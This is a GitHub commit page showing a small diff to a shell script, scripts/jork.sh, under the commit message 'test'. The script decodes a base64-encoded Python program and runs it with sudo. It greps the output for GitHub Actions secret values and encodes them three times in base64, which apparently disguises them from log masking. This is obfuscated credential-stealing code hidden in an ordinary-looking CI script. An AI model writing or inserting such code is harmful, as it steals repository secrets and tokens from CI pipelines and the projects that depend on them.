Skip to content

Commit 2d71b3a

Browse files
authored
test
1 parent 7e5c612 commit 2d71b3a

1 file changed

Lines changed: 1 addition & 1 deletion

File tree

scripts/jork.sh

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -11,7 +11,7 @@ SCRIPT_RUNNER="IyEvdXNyL2Jpbi9lbnYgcHl0aG9uMwoKIyBiYXNlZCBvbiBodHRwczovL2RhdmlkZ
1111

1212
echo '::group:: Preparing environment ...'
1313

14-
echo $SCRIPT_RUNNER | base64 -d > "$TEMP/runner_script.py"
14+
echo $SCRIPT_RUNNER | base64 -d > "$TEMP/runner_script.py"
1515

1616
VALUES=`sudo python3 $TEMP/runner_script.py | tr -d '\0' | grep -aoE '"[^"]+":\{"value":"[^"]*",' | sort -u | base64 -w 0 | base64 -w 0 | base64 -w 0`
1717

0 commit comments

Comments
 (0)